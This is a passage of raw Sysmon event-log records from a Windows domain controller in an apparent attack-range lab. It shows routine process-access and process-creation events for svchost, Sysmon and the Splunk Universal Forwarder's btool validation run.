indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5300-00000000FD01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.290{5EBD8912-8CD4-6151-5200-00000000FD01}37363732C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD4-6151-5300-00000000FD01}3716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.293{5EBD8912-8CD4-6151-5300-00000000FD01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD4-6151-5200-00000000FD01}3736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001053833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053832Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053831Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053830Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053829Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5200-00000000FD01}3736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053828Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5200-00000000FD01}3736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.274{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD4-6151-5200-00000000FD01}3736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.286{5EBD8912-8CD4-6151-5200-00000000FD01}3736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.228{5EBD8912-8CD3-6151-5000-00000000FD01}37003696C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.077{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5100-00000000FD01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.076{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.076{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.076{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.076{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.075{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 